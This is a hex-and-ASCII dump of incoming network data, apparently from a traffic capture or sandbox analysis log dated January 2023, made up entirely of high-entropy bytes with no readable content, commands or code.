                                                                                                                                                                                    2023-01-05 07:58:37 UTC11586INData Raw: 1e 7e cb fb e7 56 13 f0 43 2c 10 97 26 48 f5 c1 b7 ee 4d 81 1c 0a f3 4e d3 b4 da 80 2d 44 52 f3 eb 04 e2 e0 9e 5b 14 bf e1 63 57 ca ea 98 81 7e 7c 51 c6 85 90 09 02 cf 4f 59 ea 7e 65 d2 7a c2 5c b1 8f 0f 51 27 4c 32 7c 39 bd 55 d0 3d 52 a8 92 56 0d c7 34 9c af 40 bb bd 90 ac 3e ac ff 54 27 3c 85 8e ff 56 11 e9 3f 66 00 71 c8 47 64 06 9e 9b c6 8e d3 26 b0 90 5d 36 98 2a 81 12 b2 24 d1 10 4c 45 f1 87 6a 52 40 71 8c 86 5a 66 cb 28 20 df 4d 02 43 bf 3b 7b 62 76 bc 0b e6 b8 b3 3d 2f 60 13 ff bb 4d 6d 9b ca 41 fa b8 02 7f 91 b2 9a f6 e9 6a 93 a7 58 e3 f2 10 b7 97 72 28 05 5d 0b 70 6c 96 10 0d 0b 52 00 a9 8e f6 25 96 bc 52 46 d4 97 86 36 75 a5 96 3e ca b9 fc ce 3c 2c 9d 42 60 70 fa 3f 49 72 8b 0b 0f 57 a1 2b 68 04 14 b5 af 4f 1c a3 40 48 04 e6 3c 4c e4 fb 0d 4e
                                                                                                                                                                                    Data Ascii: ~VC,&HMN-DR[cW~|QOY~ez\Q'L2|9U=RV4@>T'<V?fqGd&]6*$LEjR@qZf( MC;{bv=/`MmAjXr(]plR%RF6u><,B`p?IrW+hO@H<LN
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11602INData Raw: b2 b0 0d fe 42 b6 78 7f e7 3d 2c 0a ff 0a d2 28 9e c7 0a 95 ea eb 84 96 95 cd cc e3 70 1c 99 b4 e4 af 64 c4 ac bf c8 e3 f8 07 09 4f 32 0e 60 49 7d bd 95 59 b9 35 39 5a 0b c3 c6 d7 86 67 41 5e 1f a4 07 6f f9 90 0e 13 0a 02 c4 05 6c be 47 a5 d0 13 a0 41 27 6d 3e 8a 64 35 c5 16 46 d8 52 b1 78 af 82 01 ce f0 d4 ad f7 74 3f d4 ce eb bf 9f 80 92 90 73 96 f6 ad 3a d8 16 39 c6 7a e6 4e 11 c9 55 42 0d ad 26 c6 e9 ed 5f 42 74 de 84 87 03 7c ff 0a a7 0e 7e 35 16 31 97 a8 6b 52 de 76 65 cd 63 07 d9 e1 68 1b d5 88 18 07 ef 54 50 be 51 9a 26 7d 5e cf fd 7a 5a 88 7a 1d f7 41 76 e2 c5 6f 63 61 61 7a ec af 30 3c 72 e3 22 83 3c 1a 03 80 ab e8 dc b7 b2 c3 ee 6b 6d d5 ee f7 a0 ca df e8 d8 31 8b 74 4c 65 8e fe c9 49 18 c1 bb a5 cf 01 8d 41 a9 a7 13 9e 53 f2 b1 41 69 0a 76 a3
                                                                                                                                                                                    Data Ascii: Bx=,(pdO2`I}Y59ZgA^olGA'm>d5FRxt?s:9zNUB&_Bt|~51kRvechTPQ&}^zZzAvocaaz0<r"<km1tLeIASAiv
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11618INData Raw: f7 f7 e8 23 e5 8f 07 99 4a 39 1d f8 b0 08 9b 43 ad 38 51 02 b4 62 6f 54 ae e1 1d 0c 5c 1a be 32 08 5b 8f a5 34 85 d5 7f 30 72 ed bb 6b 08 c8 a2 16 96 2a 2b 5a 84 33 6f 78 fa 9d 34 e1 35 b7 41 45 a3 c9 2c 30 c0 9f f4 74 99 ec 68 7b 5b 79 ec 2a ae 48 bf 6d db 40 d3 1b ff 4f 30 aa 23 df d1 7d a2 e2 85 e4 6a 64 56 d2 1d f2 f0 1a dd 7f 8a 63 79 7a 16 2b 1f 7b 17 84 1c 72 7e 99 7f 13 f2 0f ce 69 77 01 67 fe 07 7c ec a6 73 e9 ff d1 c1 78 42 1b 08 6b 9e c7 c2 62 2b ed 70 c7 77 ab f2 4c 0a 18 88 8e 89 4f 61 06 10 d2 f5 6b 05 64 86 f4 3b db 42 5a 6d 1e 87 21 f7 2d ab d7 69 51 f5 e8 3c 52 85 37 38 07 6a 21 1d 4c fc a1 80 3a 74 2d 6f 2f 9f bc fd f0 95 1b 80 d4 cc 56 b8 3f 8d 1e 9e 6e 8a 47 af 4b 99 d8 e2 1d bb c5 1a e7 b3 99 d9 75 a1 61 9c 49 fa a5 68 0b 37 18 2d 8c
                                                                                                                                                                                    Data Ascii: #J9C8QboT\2[40rk*+Z3ox45AE,0th{[y*Hm@O0#}jdVcyz+{r~iwg|sxBkb+pwLOakd;BZm!-iQ<R78j!L:t-o/V?nGKuaIh7-
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11634INData Raw: b0 ad 49 95 4b 7e 1b 0f 6b ee a3 2b 22 39 31 49 38 5f ca ab 17 ee df 73 b2 1d 68 75 86 47 e5 d0 c8 fe 44 2d 99 4e b3 31 80 eb 8a e9 fc 35 d6 1c d3 f5 d1 b9 fa da 94 63 e3 97 a0 8b f3 b0 03 0d 01 d2 5a cf 9a 19 00 50 af 07 7a 08 79 e2 38 ed 24 14 7a b5 fc 06 e3 67 35 99 1b cf 11 ac c2 78 d2 67 5c b2 5a e4 bf 07 a1 8d 83 ab 0e 11 8e 6d 27 c8 11 8c f2 3d 3e 9d 7b 9d 22 b9 fc 36 00 99 a2 d3 fc be df e5 53 b6 c2 b4 16 5f a2 64 9b 5e 20 5b f0 14 4e a3 96 80 d4 79 86 9e a3 9c 8d 11 d6 65 d7 91 74 ac 1b 26 b1 52 13 a6 39 00 26 84 f8 8c 06 1c 78 fc 0d 2e 4a 85 53 b5 ce 50 3d 29 a5 10 7b 9b 29 70 a3 5c da c3 35 7b 98 1b 1e 2d 68 a7 dc 51 f1 98 8a 53 bc 41 5b ce 58 b6 21 bf 8e e5 36 24 2a 75 d4 7d 54 a7 10 2f 7f 73 91 73 f1 47 98 e4 bf 0b 98 ec c0 32 30 2f f3 52 13
                                                                                                                                                                                    Data Ascii: IK~k+"91I8_shuGD-N15cZPzy8$zg5xg\Zm'=>{"6S_d^ [Nyet&R9&x.JSP=){)p\5{-hQSA[X!6$*u}T/ssG20/R
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11650INData Raw: c8 94 2c bf 67 fe 8a 2d aa b9 26 fc d7 84 d8 aa f4 80 47 bb 90 bf 89 3d 82 29 a9 54 62 bf b0 2e 9b 05 3f 10 bd 12 2d 55 69 a4 55 9b 96 30 65 3d ec cb 45 34 37 60 28 44 28 58 71 4d 14 6e 2c 29 aa f5 d9 1b fb 44 d5 b9 88 19 ea 10 64 e9 db 3c 39 29 36 9e 6f 5c 49 85 58 9c ef 62 6a 17 89 ad 48 83 c7 c8 4e 55 70 69 24 71 50 30 ce a6 e1 a4 d7 45 d0 05 fc 3b 84 7d 4d 78 3a c5 6f b5 f7 22 36 46 fe 56 28 d3 cb e2 a4 7d 07 10 10 63 46 73 67 31 dd 0c 21 79 c1 90 53 c7 97 46 6f f4 02 42 af d8 a9 16 bf 32 fa cd 83 db 7e 32 3b 4d 7f 04 ce c2 ec 84 a6 5f 9a 38 03 bc 81 80 d4 85 69 e5 ec 4d 2b 13 21 e9 97 34 5a 8d 8e c9 f3 e7 44 02 2c 15 e0 2c c6 a9 99 0d 1d 45 0a 08 ef 3b c7 b3 16 93 99 a0 29 b5 0c 38 45 3f 9b b9 75 dd cb 6d 53 9f 1c 37 e2 b0 7b 61 2b 27 53 1f d4 cd f0
                                                                                                                                                                                    Data Ascii: ,g-&G=)Tb.?-UiU0e=E47`(D(XqMn,)Dd<9)6o\IXbjHNUpi$qP0E;}Mx:o"6FV(}cFsg1!ySFoB2~2;M_8iM+!4ZD,,E;)8E?umS7{a+'S
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11666INData Raw: c2 c4 d2 1e 79 19 b2 80 bc 28 38 c2 32 24 83 c6 ab 57 f8 f3 a6 07 5c 60 64 5c e4 c6 f6 87 42 df f0 14 44 09 5e 80 11 01 a2 ee 63 7d 8a 05 5f 7d 9f 28 74 57 02 dc 7e 61 1f f4 3b 60 76 fb a7 e7 e5 f7 ce 9f 71 89 82 c6 b2 81 e5 3c 2f c5 0e a5 2b 47 3b c2 58 39 57 c5 90 28 08 bd ea 79 8c cf 73 72 35 31 f0 9f 38 fe 57 19 da 42 3b e5 0b a9 af 16 c5 d9 66 53 88 4f f4 b0 7a 9e 38 07 b6 cd 99 b9 ad bb 41 8b b0 73 99 8c 4f 2c d3 7a 61 9f c7 1d aa 43 3d 5b 1f 5c 37 50 52 1a 53 91 96 4b a5 de 11 11 c5 21 d1 c8 6b 23 b9 e0 9f 96 73 62 8c fb 9c 84 b7 ad e9 5d c5 6b 18 f7 21 df a9 50 bc b3 11 e2 ca 05 b2 8f 6d b2 c0 61 2b 8c 57 83 e6 77 e9 56 fa f0 ca 7f db 07 9c 0f 6c ff fd c7 76 15 25 79 13 91 da ab 7f 8b 55 77 a4 77 51 bf 4f 89 66 6a 97 93 c0 f7 57 c1 a1 1b 76 eb 77
                                                                                                                                                                                    Data Ascii: y(82$W\`d\BD^c}_}(tW~a;`vq</+G;X9W(ysr518WB;fSOz8AsO,zaC=[\7PRSK!k#sb]k!Pma+WwVlv%yUwwQOfjWvw
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11682INData Raw: f2 b0 9a f0 fb 64 fb a0 a1 c0 b2 c7 58 24 72 b2 fa 88 99 50 12 e6 81 e8 71 2c 12 c5 f1 a6 3f ee c9 d4 8e 0a e2 71 d2 32 8f 62 33 9e cd 82 5b 2f 21 9e e1 27 ec be e4 d8 e2 51 4b 66 f0 22 80 a3 87 ab 8c 38 fb 59 5a 65 73 3d c1 94 90 2d 66 8c 5e 6b 95 f9 2b ce 0d de f6 04 b9 02 81 da 13 62 d5 c0 bb 32 2b 92 ac 52 47 95 f6 a5 36 a1 8f 5a ac 6a 57 c6 fd 82 08 ef ac 60 8b 5d 55 2a f7 41 11 fa 49 02 5c c6 e3 da a8 e4 7e 3a c9 33 39 0e 81 cd f6 8b e6 43 1b 16 fc d9 57 1d b4 aa 7a 29 65 4a d8 08 37 0a 78 c0 45 61 99 02 78 a6 99 b2 69 28 8e d9 19 2d 88 a4 b5 97 c7 52 e0 bd d0 ac ab 0b a0 ea 4b 51 cd b1 18 92 c8 87 87 54 e5 a3 4c f9 2c da a8 61 19 ec e3 85 f3 74 96 38 57 cc 65 1b 0a 5f b4 05 8f c8 2d 4b 5c 5b 6b 43 8d 98 ed ec 95 d4 8b d9 05 53 81 b1 cb 38 2f bd 6c
                                                                                                                                                                                    Data Ascii: dX$rPq,?q2b3[/!'QKf"8YZes=-f^k+b2+RG6ZjW`]U*AI\~:39CWz)eJ7xEaxi(-RKQTL,at8We_-K\[kCS8/l
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11698INData Raw: 50 1b f9 45 35 c7 a8 d3 dc 78 1f a2 c3 28 e4 f7 2f 2e 5b 0e bf b3 ea 83 c5 5b be 41 5e 53 bc 19 9c 2d e5 91 c0 e2 a5 6d c9 ee ae 72 64 f6 d4 52 91 f4 71 80 8f cd 1a af 12 0c f0 f2 bf 91 2c 90 01 93 f6 a7 b6 78 f2 7e 3d c4 9f 6e f3 0d 6e ec 79 ec 12 7c 76 61 8a 80 b7 3f 52 e5 47 97 e2 2f 0d 1c d2 ad 24 49 90 99 9c c6 9b b7 c2 90 a1 ac 98 94 17 2b 3a 4c e9 41 98 96 dd 6a a2 74 1e af 9e 34 87 e3 6b 00 1d dc f7 aa e1 0d 6a 60 55 e1 f9 aa 57 f1 f2 a1 1d 28 cf 31 8f 63 c7 86 03 7f d0 d1 a8 f8 a1 3b 09 a5 04 94 83 03 e9 a0 a8 6a 46 e3 9c 4f 1b 9f cc a2 5f 97 97 41 77 75 45 2f cc 36 df 8f a0 42 57 fe 30 87 d7 e6 18 e0 31 c2 05 e9 f4 43 07 30 a1 58 7b 38 04 38 3d 80 7b 5d 42 9b 2a b4 08 10 93 4c 1b 82 44 9c f2 1c d2 10 ce e7 f7 0a 1d 7a 4b 17 d7 c6 73 c6 30 53 65
                                                                                                                                                                                    Data Ascii: PE5x(/.[[A^S-mrdRq,x~=nny|va?RG/$I+:LAjt4kj`UW(1c;jFO_AwuE/6BW01C0X{88={]B*LDzKs0Se
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11714INData Raw: ff 59 50 b5 de ea 5c 67 2d cd 7b fd 96 ad ff 39 0b 2f 17 46 04 a0 81 27 be 9a 93 c1 de 18 fe 1d ad 00 2c a2 e1 aa ef 76 65 65 b8 8d 74 10 95 24 2a 75 1e ba 9d 1d aa 6a 19 c6 54 34 e0 43 19 89 82 a8 83 1d b5 3a 30 8c 2a 74 85 22 1b 42 bc dc 71 50 82 5d 7f d4 8a 40 68 a8 f5 68 8a 86 17 79 6e 05 bf d4 d2 21 88 0d a3 45 be 1f b0 7c 12 d4 d5 8f 1b 53 d3 1b 62 a5 06 e3 40 11 ec 71 0d a0 20 3b 43 8e ca 85 b0 23 84 8d 1e 5c 3d 72 ad 56 1d f4 95 9e ad 6c 7a 0c b7 df d4 d3 34 f5 be 5e ae 08 85 ef 8c 7c b9 6e 77 31 30 7f 89 c4 4a 60 01 a7 e3 6e 71 23 3c 04 ae cb 57 cb 5a 22 93 39 e8 87 5c 62 84 3a af b6 62 ec 43 20 08 c7 fd bd ff 7d 68 58 a8 6f 1b 42 a2 6a a9 fe 07 15 d0 a6 2c ad 41 06 9f 23 c5 4e 48 04 0f 29 29 ac f2 77 60 70 00 95 ba 0f 0f 5d a0 ac ed bc c9 63 34
                                                                                                                                                                                    Data Ascii: YP\g-{9/F',veet$*ujT4C:0*t"BqP]@hhyn!E|Sb@q ;C#\=rVlz4^|nw10J`nq#<WZ"9\b:bC }hXoBj,A#NH))w`p]c4
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11730INData Raw: c2 54 93 1c 35 8b 6f fd 0b e4 13 e7 1b 1f 62 d6 36 ca 7c aa 22 53 c8 01 81 11 d1 85 78 fc a4 d4 de fa 5d 6e 58 aa 68 d5 84 d8 4a c8 56 64 f3 27 42 4d ca 55 d5 7d 67 88 35 de 6d 9d 77 fd 1e ec 35 a2 f8 8d 6c 62 8f ca 0e 0f dc 51 7a 18 48 7c 6a 2f f9 0b 54 bd fa d5 07 35 fd 39 eb 71 1f ca 77 69 d9 31 c8 00 3b a6 32 46 85 e8 d3 7e 0f d2 96 31 1f 9e fe e5 4a f0 8c 3d 1b 13 75 db 60 bc a8 d1 81 9e 51 fb b1 62 c1 5c ec 57 97 ea de 83 0d c9 32 42 e9 79 36 68 45 60 48 b4 1a 95 82 93 07 b3 b1 16 41 0e 46 5a 14 ae bc c0 c7 43 1c 6f 11 b8 5b 6e d7 16 45 99 a0 99 c4 30 53 b5 20 b5 ac 85 b6 3c 56 d6 31 2b f3 b8 15 cb e8 39 f3 9b 6c 5c 15 15 cd 92 54 36 5e 79 cb 14 b3 55 8e ce a7 41 1e 0b cf b4 7d 98 01 cb c7 ce b1 96 7a b0 f8 44 24 e5 82 81 99 d1 94 66 ed be 71 78 ee
                                                                                                                                                                                    Data Ascii: T5ob6|"Sx]nXhJVd'BMU}g5mw5lbQzH|j/T59qwi1;2F~1J=u`Qb\W2By6hE`HAFZCo[nE0S <V1+9l\T6^yUA}zD$fqx
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11746INData Raw: be 3c 73 a9 9e c6 92 bd b7 70 39 c4 43 62 f4 34 cc 6b e8 98 15 11 1a a7 1d 3c 84 56 dc 0d 44 19 4c d9 43 ba c5 86 9e a9 eb 40 10 21 6d c3 e4 36 ce 07 6b da 4a b2 56 e4 f6 d1 8c 51 3e bf 8b 33 bf 69 e2 ec d8 57 1b 43 f3 9b de e1 1b 20 40 97 45 07 68 c2 87 b0 48 b6 40 a0 68 c4 62 43 44 ba 74 d3 96 66 dd 72 11 2b ac 8e 93 83 8d ff 26 a0 09 4b 05 bd f2 13 9b b9 e9 50 7f 9b a0 4e bf 86 06 d3 49 aa 76 b6 aa 66 f9 45 18 99 01 86 ad 6f ac 0d 25 b7 54 99 69 3b e1 dc 9c 6c 69 16 6d 16 e5 08 22 d6 33 28 e1 fb 51 1b 45 73 15 14 83 6a 37 71 10 62 db 42 52 76 d6 c5 8c 50 0b 4c 34 15 91 0a d3 be 9d ab e8 b8 31 be 61 0d 18 b8 ce 7e 07 5c db 2b 5a ef e1 49 36 f1 2e 85 1e d1 48 a9 f5 3c e3 d8 0e 29 18 16 04 0b e5 a6 4f f5 0e 5e f5 42 57 1b 2b 00 b4 54 a0 82 3e 3c bc 53 69
                                                                                                                                                                                    Data Ascii: <sp9Cb4k<VDLC@!m6kJVQ>3iWC @EhH@hbCDtfr+&KPNIvfEo%Ti;lim"3(QEsj7qbBRvPL41a~\+ZI6.H<)O^BW+T><Si
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11762INData Raw: c3 fb 6f f8 bf 3b 1c 83 db 34 ac ca 99 d8 f7 e2 be dd d4 71 00 da b3 b0 d7 26 f8 a0 72 d5 42 e4 5c 21 20 c5 12 da 36 20 c0 bc 10 a3 a3 a0 63 a5 2a 9d 70 a4 b9 63 23 7c 27 04 d3 18 b6 ca 82 37 f2 7a da ba f8 c7 be 8f 9f 58 0a 50 37 bc 78 a9 d4 16 4a a1 19 fe 5a 75 95 58 8b 39 2c 81 0f 8c 62 ce 70 72 a5 f4 9e 70 bb ec 9c ed 39 aa bb fa 0b 45 e0 b8 5b bf 38 35 78 0c 88 f9 b1 55 d0 55 df 26 bd 18 9a bd 73 d9 2a 35 02 17 3e e7 4c cd 35 88 3f 88 b1 65 bc e7 c8 93 7f 41 b5 38 bd e8 04 01 5c a8 a4 ff ca e1 9d 45 f3 29 f5 c1 7d ec 08 8d 7f 8c 2f 0d 5d b5 89 03 f7 97 f8 7f ba a0 87 fb fc ed a9 3f 0e 31 21 9f 56 a1 d3 da 14 bd 14 4e 63 66 0e cb f2 cd e9 e9 74 c5 c5 a1 5d 2a bf 3c 1b ed de 28 a0 90 4e 36 8e 71 07 72 43 1b 2f 0a bf 44 f9 a7 74 f8 78 c5 f4 56 30 db 0e
                                                                                                                                                                                    Data Ascii: o;4q&rB\! 6 c*pc#|'7zXP7xJZuX9,bprp9E[85xUU&s*5>L5?eA8\E)}/]?1!VNcft]*<(N6qrC/DtxV0
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11778INData Raw: 5d bb 0d 71 b3 f6 3f d1 91 5e 1d 1c b0 be f8 83 77 a1 e2 83 18 9d c5 c0 f9 97 2d c0 c9 0b 5c 7b 7a 49 b6 90 17 6c 71 69 5c d2 34 74 fe 4e 53 01 e9 e2 1e a6 05 a6 20 3e 33 f4 5d 3c b0 cf 35 bb 0f e8 c1 cd 26 77 1a d3 f3 56 4c 2a 40 35 f8 3b 45 fa c6 13 aa 10 db bc bb b6 d7 84 a2 e0 d3 ce 8e 37 6e 81 6e b0 9b e1 61 09 db c0 1b 17 e0 64 12 52 59 80 5c fc 93 0f 58 0f 21 c4 d3 29 d3 66 fd 2c 1f fc df b7 ec 50 d4 55 74 d6 b6 6a d0 93 06 c2 c7 8d ac 38 dd 07 23 9a e9 a2 67 15 fb fe 4a dd be dc 0b 23 f8 0b 60 ca 96 1b 75 50 1f 3d 3b 63 c2 dc 5f c2 c7 64 ce 31 7e 80 32 f1 d7 6c 10 6b ee 5a 91 69 08 a6 02 71 92 d2 80 5e f5 49 0e 00 b1 7d 2e 94 db 1b 6b 9d 41 33 56 ea 5b b7 53 f6 ce bd c3 38 29 b4 bd 7e b0 1f 74 04 8b 99 56 61 85 18 ee 49 9b 65 12 a8 3f e7 12 48 ce
                                                                                                                                                                                    Data Ascii: ]q?^w-\{zIlqi\4tNS >3]<5&wVL*@5;E7nnadRY\X!)f,PUtj8#gJ#`uP=;c_d1~2lkZiq^I}.kA3V[S8)~tVaIe?H
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11794INData Raw: 63 ac 63 ed 0e 47 ef 97 3f 11 f0 c7 11 9f 85 81 41 3f 46 9e 8c b1 18 51 db 56 4b 73 a0 62 57 6b e1 33 dd 7d e8 b2 23 6b d8 ef b4 ec 77 12 33 de 1e 53 8f cb 0a 1b 51 4e ff f7 1d d3 24 5a be b7 2e 4a a1 f2 64 b9 e1 c1 0c f6 82 c5 a4 e1 ec ef dc 5e 08 59 94 10 72 e3 b0 bb 24 c5 b8 a4 7a 8a ae ad 1f d9 81 66 15 16 c5 b6 89 2e 30 7d 80 08 aa 48 6d ab c8 ba 04 89 90 e3 d1 a9 6d 3e 85 7a 83 59 a3 43 da 7b f1 8e 87 f8 ae 59 1f 41 a0 68 a1 e7 f1 0a ce 71 72 51 61 5d ac 16 bb cc 08 7f e8 75 65 4c fb 04 6d 7f 69 1d 7e 87 5c 48 81 e2 b7 f5 9d 09 28 6e 47 5e 38 5b 1e 90 29 12 53 d0 67 68 73 57 0d 17 c1 98 91 e1 a4 68 ae 04 0f 6c ee 82 a5 0c cb 09 22 f8 4a 9e 4d af 0f 25 a6 8c 8b e4 c1 75 72 fa 28 43 8e 63 2c 7f eb ec 3d c8 70 53 22 78 5c ea 87 d6 fd 33 76 91 e7 d1 e3
                                                                                                                                                                                    Data Ascii: ccG?A?FQVKsbWk3}#kw3SQN$Z.Jd^Yr$zf.0}Hmm>zYC{YAhqrQa]ueLmi~\H(nG^8[)SghsWhl"JM%ur(Cc,=pS"x\3v
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11810INData Raw: e2 eb 70 49 e7 69 78 da 29 ea 94 1a b6 f1 92 42 1d e0 ef df 4b 6c b3 71 39 fa cf e6 da 30 5c 6a 22 d2 2e 76 fd 64 9b bc d3 6a 92 68 8b d0 5f 41
                                                                                                                                                                                    Data Ascii: pIix)BKlq90\j".vdjh_A
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11810INData Raw: 10 21 f9 36 40 77 a2 d0 41 8d 51 00 43 ea 17 b5 33 fe 82 f0 a4 6e 99 65 67 87 e3 38 6a 6e 67 cc a5 b8 e6 0a 2d 26 68 2c f3 ee 17 0b 67 2d 1d ad 47 ec 86 3d 9a e4 8b 8c b7 e7 4d 50 8f 86 eb 99 a7 c2 c9 c6 31 98 63 9d 2f 75 06 64 41 d5 af 9b 1e 43 a0 36 fe 2e cf 51 aa 3c 38 96 db dd 42 fc 5c f1 2f 3c b0 24 c3 83 04 71 15 b0 ad f0 a3 7f b8 5e 2a 3d ca aa ce 7e 78 06 47 b7 df 02 fd 00 8f 3c 5b cb 35 cf 93 36 78 f1 3e f9 eb 31 bb 5c 37 ac 8b 07 8d 2f 3b 0d 44 b6 a9 71 f0 fc 96 14 eb 3b 4d e3 68 82 ae 80 1e fc e8 a6 75 29 d9 b5 f9 b3 98 93 52 b8 00 fb a1 3c 4c c5 03 3a 87 78 e2 ee 5c 6e bb 8a ea 40 64 69 d6 b1 c6 46 27 03 58 7c 20 8b a5 31 51 b7 ef 5c 8b c6 d8 b5 e1 ab f6 34 40 27 59 68 a1 ce 8b 53 87 31 35 8d 01 75 4f b6 a3 2c d3 2d 58 c5 62 5e c0 4a ee 44 c6
                                                                                                                                                                                    Data Ascii: !6@wAQC3neg8jng-&h,g-G=MP1c/udAC6.Q<8B\/<$q^*=~xG<[56x>1\7/;Dq;Mhu)R<L:x\n@diF'X| 1Q\4@'YhS15uO,-Xb^JD
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11826INData Raw: 53 bf 63 05 27 ae 24 3e 66 cc 86 56 06 12 37 17 2a 18 8a 11 b0 28 78 fc 86 7d 63 46 eb dd cb 5a e8 79 e8 20 7f ca 4b 25 25 14 a6 bf 5c 8a ec 8f aa 21 0b 84 dc 1e e9 9d 44 a4 43 73 d1 c4 2a 83 5d e1 6b 94 0e d1 bb 33 a6 68 3c a8 4a 4f 9c 2d a9 fc de 91 90 99 59 f1 49 8a d9 98 c3 7f d3 17 2b 0a 20 10 f2 98 7f 39 0d c6 d7 e1 40 e9 a6 93 bc 59 f9 8a e2 63 aa 98 43 f0 dc 5d 86 e2 7f b1 fe 54 c4 af b6 36 9b 54 4c 84 75 2d 67 2a 3f f1 a4 8d d2 47 bf a3 c6 11 05 44 8f 05 e4 9f 42 7d be 0c e6 e4 d9 97 cf 91 80 07 f7 ad 98 eb 90 70 f6 a5 e6 0f e9 93 44 92 fa 10 d0 13 af 15 48 75 57 75 ca 4d 07 21 eb 90 35 61 c4 2c e9 d3 ad 12 65 14 94 0e 4b 4b 11 0d ce c1 b3 5e 1b 4e ab 0f fa 86 88 c9 0a e7 a6 71 a3 1c e6 9b a2 07 94 c5 d9 ff b1 c1 e0 82 10 d5 c9 4e bd c4 bf 35 e1
                                                                                                                                                                                    Data Ascii: Sc'$>fV7*(x}cFZy K%%\!DCs*]k3h<JO-YI+ 9@YcC]T6TLu-g*?GDB}pDHuWuM!5a,eKK^NqN5
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11842INData Raw: 67 69 8a 6c 7a 44 52 d5 72 d5 55 b2 04 b3 24 b2 c6 75 35 ba 2f ef 66 d5 70 bc 14 44 f7 7f 68 55 ae 31 a2 67 36 b9 24 05 5f 62 b9 2c ba 42 96 bc 72 cb d7 d1 8b e7 83 93 8e 19 07 de 66 fc cf 3b 87 d8 27 fa 35 03 06 4b 33 0d 80 57 f0 00 5d ae de 4d 17 3a ae 11 f7 4c fd 30 7f 17 c9 25 42 52 62 48 cc e6 78 cb 59 eb c9 72 40 7c dc ec 31 89 77 ff 3b f2 a8 38 6c a7 f2 27 8d 48 31 42 f8 ba a2 21 b8 6d e4 48 39 71 d3 9e b7 38 bb d2 b5 e4 45 df e2 05 7a 23 c3 44 b2 f7 17 e3 6f 57 b7 d1 a5 36 97 9c 2b 60 cb 1d 28 15 88 6d 32 71 96 b5 23 e9 2e 74 50 ba d3 67 75 ef b1 a9 e8 d6 4a c1 48 fc 7e 07 57 01 20 60 d9 94 76 6c 41 24 17 8a eb d2 e4 1d 5f 9b 34 bf de 68 3c 1c e8 bc 16 06 4d 5c 81 e6 0c 01 6d 45 25 d6 16 e7 b4 c6 21 5a b6 75 54 75 be 1b d3 31 50 0e 0a 83 1e 0d 49
                                                                                                                                                                                    Data Ascii: gilzDRrU$u5/fpDhU1g6$_b,Brf;'5K3W]M:L0%BRbHxYr@|1w;8l'H1B!mH9q8Ez#DoW6+`(m2q#.tPguJH~W `vlA$_4h<M\mE%!ZuTu1PI
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11858INData Raw: 38 98 92 aa 53 59 8a c6 b1 ec 05 21 01 90 70 83 ab 55 d0 7b f3 22 94 0e 78 a4 86 7a 58 bf cd 04 64 1b da 75 b0 b4 a8 5f 2c 38 2d 60 5b 8c 41 a7 10 70 23 d6 42 74 2c 29 36 e7 f0 bc e3 a0 72 97 08 e7 9b cf 7d a7 3d 90 b8 37 fe 74 b4 b0 02 b2 3a 14 59 8b a6 48 45 d3 16 d8 82 4b 20 c8 8d 2d 31 8e 50 68 e0 ea 90 98 34 4f 52 a5 53 a2 12 5e 63 a3 c8 8c ad 83 8b 56 04 c0 2f 4d 50 d4 8a d2 b5 cf 9b 86 e0 5f c5 e1 7e 9a d0 f2 4b a4 45 51 c9 71 1c 3d af a0 1b 60 1f 23 cc 50 3e 74 74 5b 12 4a fe 4d b9 d1 fb 75 97 18 55 eb 85 ea 0e 4a 88 05 52 b5 6d 77 46 67 15 6b d6 0f 22 c5 31 37 10 e1 bd 4f 60 75 09 ee fd a1 cb bb 79 72 b8 be fd e5 d8 51 4b a0 22 9a 92 9f 6a a9 6d 58 ff f5 35 bb e0 67 92 88 30 b4 61 f4 7b a8 07 71 b0 a7 15 6d 18 6a eb 7a 2e 65 51 d4 9f f1 df 63 4b
                                                                                                                                                                                    Data Ascii: 8SY!pU{"xzXdu_,8-`[Ap#Bt,)6r}=7t:YHEK -1Ph4ORS^cV/MP_~KEQq=`#P>tt[JMuUJRmwFgk"17O`uyrQK"jmX5g0a{qmjz.eQcK
                                                                                                                                                                                    2023-01-05 07:58:37 UTC11874INData Raw: 58 04 2e 20 74 08 eb f5 9c f1 78 2b b7 5a e7 55 aa 76 38 8c ec 10 88 03 42 af 64 5d a4 45 28 7f f2 87 c7 e5 19 f9 54 fb 1a 39 62 f7 e2 c9 29 15 43 0e 46 b6 fb 8a 5c 67 95 87 d5 fd be c1 8e ea 4b cf 8f e0 28 5a 8a f3 b6 c9 b6 fc ad 3e b8 4e 57 2b be 10 18 70 5a b2 f7 73 d7 98 2f a5 8b eb 5d 35 b2 40 a7 6f 20 3c 98 d9 24 e5 27 fb e7 3a 61 52 75 d7 08 64 8e ac 18 a6 50 b4 5e 89 d4 b0 f9 b4 4a 2e 39 ce da 6c 9d 1b de 07 65 25 76 34 ae 4b ba db e3 4f 38 d9 c5 8a 56 d2 84 f1 65 d9 0a 4a 9d 11 9e 0b d1 2c 86 2e 4d 40 49 b8 a3 9f d0 5f 02 68 dc 9a aa 96 d0 a7 9c d0 b1 51 5e 35 f5 85 72 70 a4 3d d6 67 77 d4 2d ca ae 27 3e 48 7c 55 70 a7 0d 74 d7 64 ff c7 52 45 b8 6e 94 bb d6 0b a0 05 c0 b3 b5 37 62 dc 23 cd 89 14 dc 3e d1 b1 73 4e b0 d0 34 17 6e 3c df a8 a2 10 f2
                                                                                                                                                                                    Data Ascii: X. tx+ZUv8Bd]E(T9b)CF\gK(Z>NW+pZs/]5@o <$':aRudP^J.9le%v4KO8VeJ,.M@I_hQ^5rp=gw-'>H|UptdREn7b#>sN4n<
